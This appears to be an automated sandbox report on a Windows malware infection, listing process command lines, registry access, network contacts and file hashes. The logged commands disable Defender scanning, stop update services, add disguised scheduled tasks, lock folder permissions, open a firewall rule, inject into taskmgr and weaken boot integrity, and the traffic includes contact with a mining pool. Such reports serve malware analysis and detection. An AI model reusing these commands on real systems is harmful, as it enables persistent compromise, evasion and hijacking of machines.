PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 2852 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\47d27377-79df-432b-8551-6c7c0f0cd77c" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

"C:\Users\Admin\AppData\Local\Temp\D2D9.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

"C:\Users\Admin\AppData\Local\Temp\D2D9.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\E2B2.exe

C:\Users\Admin\AppData\Local\Temp\E2B2.exe

C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe

"C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F366.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\F366.dll

C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe

"C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe"

C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe

"C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe"

C:\Users\Admin\AppData\Local\Temp\4D4.exe

C:\Users\Admin\AppData\Local\Temp\4D4.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe

"C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build3.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe

"C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe"

C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\4261.exe

C:\Users\Admin\AppData\Local\Temp\4261.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 72

C:\Windows\system32\taskeng.exe

taskeng.exe {850AF011-AFE1-4E78-BDBA-7C3AF3289EE9} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231015142332.log C:\Windows\Logs\CBS\CbsPersist_20231015142332.cab

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe

"C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {CD0FF74C-32A2-4102-A5BC-9F0DF2C3B8EC} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\grrhfnlxagtw.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 onualituyrs.org udp
RU 91.215.85.209:80 onualituyrs.org tcp
RU 91.215.85.209:443 onualituyrs.org tcp
RU 91.215.85.209:443 onualituyrs.org tcp
US 8.8.8.8:53 sumagulituyo.org udp
US 34.94.245.237:80 sumagulituyo.org tcp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 liuliuoumumy.org udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 188.114.96.0:443 tcp
US 188.114.96.0:443 api.2ip.ua tcp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 zexeq.com udp
KR 211.171.233.129:80 zexeq.com tcp
MX 201.124.243.137:80 colisumy.com tcp
KR 211.171.233.129:80 zexeq.com tcp
RU 79.137.192.18:80 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 72.21.81.240:80 tcp
JP 23.207.106.113:443 tcp
DE 128.140.102.206:80 128.140.102.206 tcp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 montereyclub.org udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 galandskiyher5.com udp
NL 194.169.175.127:80 galandskiyher5.com tcp
US 95.214.27.254:80 95.214.27.254 tcp
US 8.8.8.8:53 parrotnight.com udp
US 188.114.97.0:443 parrotnight.com tcp
US 8.8.8.8:53 unclejohny.com udp
US 172.67.187.91:443 unclejohny.com tcp
RU 31.41.244.27:41140 tcp
US 8.8.8.8:53 udp
NL 149.154.167.99:443 tcp
NL 149.154.167.99:443 tcp
NL 149.154.167.99:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 crl.microsoft.com udp
US 2.18.121.147:80 crl.microsoft.com tcp
FR 146.59.161.13:39199 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 d4e8cbbe-393e-42c2-86af-3de8e5ca988e.uuid.filesdumpplace.org udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp

Files

memory/2016-1-0x0000000000780000-0x0000000000880000-memory.dmp

memory/2016-2-0x0000000000220000-0x000000000022B000-memory.dmp

memory/2016-3-0x0000000000400000-0x00000000005B3000-memory.dmp

memory/2016-5-0x0000000000400000-0x00000000005B3000-memory.dmp

memory/1228-4-0x00000000029F0000-0x0000000002A06000-memory.dmp

memory/2016-8-0x0000000000220000-0x000000000022B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/2660-21-0x0000000002C60000-0x0000000002CF1000-memory.dmp

memory/2756-25-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/2660-31-0x0000000002C60000-0x0000000002CF1000-memory.dmp

memory/2756-28-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2756-33-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2756-32-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2660-26-0x0000000004460000-0x000000000457B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/2660-22-0x0000000002C60000-0x0000000002CF1000-memory.dmp

C:\Users\Admin\AppData\Local\47d27377-79df-432b-8551-6c7c0f0cd77c\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/2756-54-0x0000000000400000-0x0000000000537000-memory.dmp

memory/896-56-0x00000000002D0000-0x0000000000361000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/896-57-0x00000000002D0000-0x0000000000361000-memory.dmp

\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/2852-64-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/2852-65-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E2B2.exe

MD5 22b5ba8e29ad46aea74520369763650a
SHA1 5477b1f2384bc99e50cf8414c6adfe2e9c0ab2ec
SHA256 ebd8083f3e802cac490686d05a3fe08e2305a6657a9af5ef38fe772496f621ec
SHA512 38cb42bbb50a3aca19c3af8af01bf5d46e27841f50df2fc421183550daad6b65f91c3e454705a9e3ad9706a198c7bd928d6e2d1487a369cd7d3788e547e6eead

\Users\Admin\AppData\Local\Temp\E2B2.exe

MD5 22b5ba8e29ad46aea74520369763650a
SHA1 5477b1f2384bc99e50cf8414c6adfe2e9c0ab2ec
SHA256 ebd8083f3e802cac490686d05a3fe08e2305a6657a9af5ef38fe772496f621ec
SHA512 38cb42bbb50a3aca19c3af8af01bf5d46e27841f50df2fc421183550daad6b65f91c3e454705a9e3ad9706a198c7bd928d6e2d1487a369cd7d3788e547e6eead

C:\Users\Admin\AppData\Local\Temp\CabE37C.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a3c5481d544044e04fdcd9be5914df0f
SHA1 27ee8d123b50672d038a978611888588866b5c11
SHA256 ce1d5ca651d49a0ade76663a61eea3ac6a0d6ac8dc722d9ba0b77b33de9d9706
SHA512 f4875e4cacd9abfce055659db0e68b153b312f897759aeb7a32ccadd6108b5154717fa6af0d30039df7d72aa375a46a78ee0e9fd5f5abb531b882f025267583c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 3d4e79c9e73ef9f1da47373d3ab78b0a
